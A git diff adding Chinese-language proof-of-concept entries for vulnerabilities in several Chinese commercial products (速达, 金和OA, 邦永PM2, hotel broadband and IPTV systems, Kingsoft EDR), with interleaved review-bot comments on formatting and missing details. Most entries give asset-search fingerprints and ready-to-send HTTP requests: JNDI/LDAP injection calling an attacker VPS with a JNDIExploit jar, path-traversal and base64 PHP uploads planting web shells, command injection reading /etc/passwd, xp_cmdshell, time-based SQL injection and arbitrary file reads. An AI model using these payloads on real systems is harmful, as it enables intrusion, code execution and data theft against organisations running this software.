/login/home_jsontest.action?reqType=json&ISLOGIN=TRUE&eid=1&msg=1&errNo=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +cmd: whoami +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=96BFB09D9ED705FAF1EFD3CF45ECFFFC +Connection: close +``` + +![1705075717234-da653e58-3474-4718-9917-d7a1d5f6e028.png](./img/vbR5mYTuE8woTkQt/1705075717234-da653e58-3474-4718-9917-d7a1d5f6e028-765312.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞.md b/速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞.md new file mode 100644 index 0000000..8764536 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞.md 
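Review bot: `JNID` to `JNDI` in filename and title, as in the sibling entries. `Cookie: JSESSIONID=96BFB09D9ED705FAF1EFD3CF45ECFFFC` is a captured session value and should be a placeholder. `影响版本` lists only `多款产品` with no product names or versions, so the entry cannot be mapped to an asset inventory; name the products the `web.body` fingerprint was verified against.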
@@ -0,0 +1,81 @@ +# 速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品voucherauditdo存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/TlMETPa1inTIybRs/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-675709.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/TlMETPa1inTIybRs/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-994840.png) + +# 四、漏洞复现 +1. 获取dnslog + +```plain +g58b0k.dnslog.cn +``` + +![1705075159021-2f829661-f6a2-4877-a2e3-d16320f8cac1.png](./img/TlMETPa1inTIybRs/1705075159021-2f829661-f6a2-4877-a2e3-d16320f8cac1-536627.png) + +2. 检测是否存在漏洞 + +```plain +GET /account/voucher/voucherauditdo!toEdit.action?billId=${jndi:ldap://g58b0k.dnslog.cn} HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +cmd: whoami +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705075219543-d6f88494-a50a-487a-a203-e1cca93f0077.png](./img/TlMETPa1inTIybRs/1705075219543-d6f88494-a50a-487a-a203-e1cca93f0077-736341.png) + +![1705075233260-58dbace8-b56d-4880-b43e-73f2be788dbe.png](./img/TlMETPa1inTIybRs/1705075233260-58dbace8-b56d-4880-b43e-73f2be788dbe-552308.png) + +漏洞利用 + +[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146450-e43931b2-c4c5-4cf5-859c-4328905c634c.jar) + +将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps` + +```plain +java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip +``` + 
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/TlMETPa1inTIybRs/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-414644.png) + +```plain +GET /account/voucher/voucherauditdo!toEdit.action?billId=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +cmd: whoami +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705075417091-bed33e43-e858-400a-86f9-6a14714033ca.png](./img/TlMETPa1inTIybRs/1705075417091-bed33e43-e858-400a-86f9-6a14714033ca-450138.png) + + + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/速达软件技术(广州)有限公司多款产品存在代码执行.md b/速达软件技术(广州)有限公司多款产品存在代码执行.md new file mode 100644 index 0000000..a9eb2a5 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品存在代码执行.md 
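Review bot: the `检测是否存在漏洞` request (dnslog callback) already carries `cmd: whoami`, a header that only matters for the `TomcatEcho` request below; it was evidently copied from there and should be removed from the detection step so the two requests differ only in the thing being demonstrated. `JNID` to `JNDI` in filename and title. The session cookie `JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B` is reused across four 速达 files and should be a placeholder. There are also four blank lines before `> 更新:` where the other entries have two.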
@@ -0,0 +1,33 @@ +# 速达软件技术(广州)有限公司多款产品存在代码执行 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品存在代码执行 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/qU0ioA6OURUhWwoZ/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-063607.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/qU0ioA6OURUhWwoZ/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-739350.png) + +# 四、漏洞复现 +隐患url + +```plain +/home +/login/logout.action +/login/login!logout.action +``` + +[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146681-3438373c-407e-4d21-a238-4c77f89447f8.jar) + +![1699201336386-ba0796bb-835f-48ef-80fc-08e3fcd0cdf4.png](./img/qU0ioA6OURUhWwoZ/1699201336386-ba0796bb-835f-48ef-80fc-08e3fcd0cdf4-601797.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/速达软件技术(广州)有限公司多款产品存在文件上传漏洞.md b/速达软件技术(广州)有限公司多款产品存在文件上传漏洞.md new file mode 100644 index 0000000..1ac47a0 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品存在文件上传漏洞.md 
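Review bot: the entry documents nothing beyond three paths and a screenshot of a GUI tool (`Strruts2全版本漏洞测试工具17-6过WAF版.jar`, note the `Strruts2` spelling): it does not say which Struts2 advisory (S2-xxx / CVE) applies, which Struts version the products ship, or what the tool reported, so neither a reviewer nor a defender can verify or detect it. Add the Struts advisory reference and the affected Struts version, or mark the entry as unverified. `漏洞简介` and the title are the same sentence; one of them should carry the impact statement.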
@@ -0,0 +1,49 @@ +# 速达软件技术(广州)有限公司多款产品存在文件上传漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品存在文件上传漏洞 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/8uIHpAGZiK2xZUfi/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-445073.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/8uIHpAGZiK2xZUfi/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-623971.png) + +# 四、漏洞复现 +```plain +GET /report/DesignReportSave.jsp?report=../stc.jsp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=32A62132D706D2E2F3F66875BD5C012A +Upgrade-Insecure-Requests: 1 +Content-Length: 68 + +<%@ page contentType="text/plain" %> +<% + out.print("test"); +%> +``` + +![1699459017913-2e909a95-490d-49fd-91c6-919310c1a031.png](./img/8uIHpAGZiK2xZUfi/1699459017913-2e909a95-490d-49fd-91c6-919310c1a031-824767.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/stc.jsp +``` + +![1699459047529-aa755f62-c725-4f3c-8e94-ac661fecb70f.png](./img/8uIHpAGZiK2xZUfi/1699459047529-aa755f62-c725-4f3c-8e94-ac661fecb70f-697918.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md b/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md new file mode 100644 index 0000000..220a81f --- /dev/null +++ b/邦永PM2项目管理系统Global_UserLogin.aspxSQL注入漏洞.md 
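Review bot: the PoC writes `stc.jsp` into the web root via `report=../stc.jsp` and `上传文件位置` confirms it is reachable, but nothing says to remove the file afterwards; a reproduction note that leaves an executable JSP on a target should document cleanup. `漏洞简介` is the title repeated with no root cause, although both the traversal in `report` and the missing extension check are visible in the request and worth one sentence. `Cookie: JSESSIONID=32A62132D706D2E2F3F66875BD5C012A` should be a placeholder, and a GET request carrying a body is unusual enough to deserve a note.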
@@ -0,0 +1,36 @@ +# 邦永PM2项目管理系统Global_UserLogin.aspx SQL注入漏洞 + +# 一、漏洞简介 +邦永PM2项目管理系统Global_UserLogin.aspx SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 邦永PM2项目管理系统 + +# 三、资产测绘 ++ hunter`web.body="PM2项目管理系统BS版增强工具.zip"` ++ 特征 + +![1701347452885-d3cea2a7-432e-40cc-9a7d-3f38f56de6e5.png](./img/rcZ2NB48Dm1SUHjI/1701347452885-d3cea2a7-432e-40cc-9a7d-3f38f56de6e5-486911.png) + +# 四、漏洞复现 +```plain +GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 +Host: pm2.sunwayopto.cn:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1701348148996-78c9e2ba-9e67-47d4-9660-f03ef1fc5448.png](./img/rcZ2NB48Dm1SUHjI/1701348148996-78c9e2ba-9e67-47d4-9660-f03ef1fc5448-854696.png) + +sqlmap + +```plain +/Global/Global_UserLogin.aspx?accId=1 +``` + +![1701348163542-81132564-5077-4727-9372-c4579e401148.png](./img/rcZ2NB48Dm1SUHjI/1701348163542-81132564-5077-4727-9372-c4579e401148-428762.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: \ No newline at end of file diff --git a/酒店宽带运营系统server_ping远程命令执行漏洞.md b/酒店宽带运营系统server_ping远程命令执行漏洞.md new file mode 100644 index 0000000..8eff2f6 --- /dev/null +++ b/酒店宽带运营系统server_ping远程命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# 酒店宽带运营系统server_ping远程命令执行漏洞 + +# 一、漏洞简介 +安美数字 酒店宽带运营系统 server_ping.php 存在远程命令执行漏洞,漏洞文件中ip参数未过滤造成命令执行。 + +# 二、影响版本 ++ 安美数字 酒店宽带运营系统 + +# 三、资产测绘 ++ fofa`"酒店宽带运营"` ++ 特征 + +![1716733888763-054f1cd7-9341-4200-9146-ac1991441834.png](./img/ttotGXeiX4zpQ9fZ/1716733888763-054f1cd7-9341-4200-9146-ac1991441834-819573.png) + +# 四、漏洞复现 +```rust +GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../stc.txt&id=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Cookie: PHPSESSID=noei1ghcv9rqgp58jf79991n04 +``` + +![1716733909837-15f70e37-1a79-41f6-963f-9cf8f0baac48.png](./img/ttotGXeiX4zpQ9fZ/1716733909837-15f70e37-1a79-41f6-963f-9cf8f0baac48-535338.png) + +```rust +/stc.txt +``` + +![1716733930150-c5db087e-acac-4280-be9c-23405a570807.png](./img/ttotGXeiX4zpQ9fZ/1716733930150-c5db087e-acac-4280-be9c-23405a570807-124394.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: \ No newline at end of file diff --git a/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md b/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md new file mode 100644 index 0000000..8a86447 --- /dev/null +++ b/酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞.md 
@@ -0,0 +1,28 @@ +# 酒店智慧营销IPTV系统userlogin.php存在sql注入漏洞 + +子辰视讯IPTV系统拥有电信级全业务功能,支持电视直播(IGMP组播模式和HLS单播模式同时)、4K超高清、时移回看、内网视频点播、外网OTT点播、桌面定制、应用推送、字幕广告、挂角广告、用户认证计费和到期提醒等。该系统 userlogin.php存在sql注入漏洞,攻击者可利用该漏洞获取系统信息。 + +## fofa + +```javascript +body="xsiptvp" +``` + +## poc + +```javascript +POST /xsiptva/cniptv/userlogin.php HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 113 +Content-Type: application/x-www-form-urlencoded +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 + +username=admin' AND (SELECT 6707 FROM (SELECT(SLEEP(5)))mQbf) AND '1'='1&password=admin +``` + diff --git a/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md b/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md new file mode 100644 index 0000000..e3fcd74 --- /dev/null +++ b/金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞.md 
@@ -0,0 +1,24 @@ +# 金华迪加现场大屏互动系统mobile.do.php任意文件上传漏洞 + +金华迪加 现场大屏互动系统 mobile.do.php 存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。 + +## fofa + +```javascript +body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统" +``` + +## poc + +```javascript +POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: close + +filetype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4= +``` + +![image-20241101195240598](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011952654.png) \ No newline at end of file diff --git a/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md b/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md new file mode 100644 index 0000000..d0706e1 --- /dev/null +++ b/金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞.md 
@@ -0,0 +1,48 @@ +# 金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞 + +# 一、漏洞简介 +金华迪加网络科技有限公司是一家民营企业,专注于开发和优化现场互动系统平台,其主要产品是现场活动大屏幕系统。这个系统被设计用于增强活动现场的互动性,提供技术支持给合作企业。金华迪加网络科技有限公司现场大屏互动系统mobile.do.php接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。 + +# 二、影响版本 ++ 现场大屏互动系统 + +# 三、资产测绘 ++ fofa`body="/wall/themes/meepo/assets/images/defaultbg.jpg"||title="现场活动大屏幕系统"` ++ 特征 + +![1730269921021-87848d90-a4b8-45ad-a45f-50ab8325acda.png](./img/pq8x-rL1g-iCOQR9/1730269921021-87848d90-a4b8-45ad-a45f-50ab8325acda-824803.png) + +# 三、漏洞复现 +```plain +POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Connection: keep-alive +Cookie: PHPSESSID=b8u1t0sl69oh62hn91t3tb61a2 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Priority: u=0, i +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 + +filetype=php&imgbase64=PD9waHAgZWNobyBtZDUoMSk7dW5saW5rKF9fRklMRV9fKTsgPz4= +``` + +![1730269929978-dad97914-e3b0-4c81-b804-9777de2383ea.png](./img/pq8x-rL1g-iCOQR9/1730269929978-dad97914-e3b0-4c81-b804-9777de2383ea-285779.png) + +```plain +/data/pic/pic_173026980616947.php +``` + +![1730269949318-34320c82-8bd3-454c-9e09-23af98caed79.png](./img/pq8x-rL1g-iCOQR9/1730269949318-34320c82-8bd3-454c-9e09-23af98caed79-931197.png) + + + +> 更新: 2024-11-27 10:00:08 +> 原文: \ No newline at end of file diff --git a/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md b/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md new file mode 100644 index 0000000..95d0bce --- /dev/null +++ b/金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞.md 
@@ -0,0 +1,29 @@ +# 金和JC6协同管理平台oaplusrangedownloadfile存在文件下载漏洞 + +金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。金和JC6协同管理平台oaplusrangedownloadfile 存在文件下载漏洞,攻击者可利用该漏洞获取服务器敏感信息。 + +## fofa + +```javascript +app="Jinher-OA" +``` + +## poc + +```javascript +GET /jc6/JHSoft.WCF/login/oaplusrangedownloadfile?filename=../WEB-INF/classes/db.properties HTTP/1.1 +Host: +accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412132156695.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/TjNcd628M9COW2H9nTMPKQ diff --git a/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md b/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..19200b6 --- /dev/null +++ b/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞 + +北京金和网络股份有限公司C6协同管理平台DBModules.aspx存在SQL注入漏洞,攻击者可获取数据库敏感数据。 + +## fofa + +```yaml +body="c6/Jhsoft.Web.login" +``` + +## poc + +```java +GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 +Host: 123.57.26.236 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/tv_5OOH6CoQDZsZKzu8CDw \ No newline at end of file diff --git a/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md b/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md new file mode 100644 index 0000000..8b1ac8d --- /dev/null +++ b/金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568).md 
@@ -0,0 +1,25 @@ +# 金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568) + +金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。 + +## fofa + +```javascript +app="金和网络-金和OA" +``` + +## poc + +```javascript +POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/xml + + %remote;]> +``` + +![image-20241029095818142](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290958202.png) \ No newline at end of file diff --git a/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md b/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..8dc41da --- /dev/null +++ b/金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞 + +金和oa协同管理平台(又称金和C6协调管理平台),共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围。该系统存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="金和网络-金和OA" +``` + +## poc + +```javascript +GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:2'-- HTTP/1.1 +Host: +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131412695.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/QvQXcg1UeNzILoY7n8c57g \ No newline at end of file diff --git a/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md b/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..707adbc --- /dev/null +++ b/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md 
@@ -0,0 +1,22 @@ +# 金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞 + +金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="金和网络-金和OA" +``` + +## poc + +```javascript +POST /C6/JQueryUpload/AjaxFile/jQueryUploadify.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Type: application/x-www-form-urlencoded + +type=delete&fileId=-99';WAITFOR+DELAY'0:0:5'-- +``` \ No newline at end of file diff --git a/金和OA-jc6-clobfield-SQL注入漏洞.md b/金和OA-jc6-clobfield-SQL注入漏洞.md new file mode 100644 index 0000000..98d46f9 --- /dev/null +++ b/金和OA-jc6-clobfield-SQL注入漏洞.md @@ -0,0 +1,19 @@ +## 金和OA jc6 clobfield SQL注入漏洞 +金和OA jc6 ljc6/servlet/clobfield接口处存在SQL注入漏洞,攻击者可获取数据中中敏感信息。 + +## fofa +``` + +title="金和协同管理平台" || body="js/PasswordCommon.js" || body="js/PasswordNew.js" || body="Jinher Network" || (body="c6/Jhsoft.Web.login" && body="CloseWindowNoAsk") || header="Path=/jc6" || (body="JC6金和协同管理平台" && body="src=\"/jc6/platform/") || body="window.location = \"JHSoft.MobileApp/Default.htm\";" || banner="Path=/jc6" +``` + +## poc +``` +POST /jc6/servlet/clobfield HTTP/1.1 +host:127.0.0.1 + +key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27 +``` +![image](https://github.com/wy876/POC/assets/139549762/09333181-7373-4930-ad60-91e168709564) + + diff --git a/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md b/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..cdcc842 --- /dev/null +++ b/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,14 @@ +## 某和OA C6-GetSqlData.aspx SQL注入漏洞 +``` +POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 +Connection: close +Content-Length: 189 +Content-Type: text/plain +Accept-Encoding: gzip + +exec master..xp_cmdshell 'ipconfig' +``` + +![image-20241231151107209](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412311511460.png) diff --git a/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md b/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..0d4dabb --- /dev/null +++ b/金和OA系统接口SignUpload.ashx存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 金和OA系统接口SignUpload.ashx存在SQL注入漏洞 + +金和OA系统接口SignUpload.ashx存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="JHSoft.Web.AddMenu" || app="金和网络-金和OA" || app="Jinher-OA" +``` + +## poc + +```java +GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%201%27+--%20and%201=1_123_123&filename=1 HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 +Connection: close +Content-Length: 189 +Content-Type: text/plain +Accept-Encoding: gzip +``` + +![image-20240920134727109](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201347183.png) diff --git a/金山EDR-RCE漏洞.md b/金山EDR-RCE漏洞.md new file mode 100644 index 0000000..118494f --- /dev/null +++ b/金山EDR-RCE漏洞.md 
@@ -0,0 +1,60 @@ +## 金山EDR RCE漏洞 +``` +开启⽇志 /Console/inter/handler/change_white_list_cmd.php id参数 +POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 +Host: 192.168.24.3:6868 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 +Firefox/114.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 131 +Origin: http://192.168.24.3:6868 +Connection: close +Referer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0 + +{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9- +AE5A","id":"111;set//global//general_log=on;","type":"0"}} + +设置日志php文件 +POST /inter/ajax.php?cmd=get_user_login_cmd 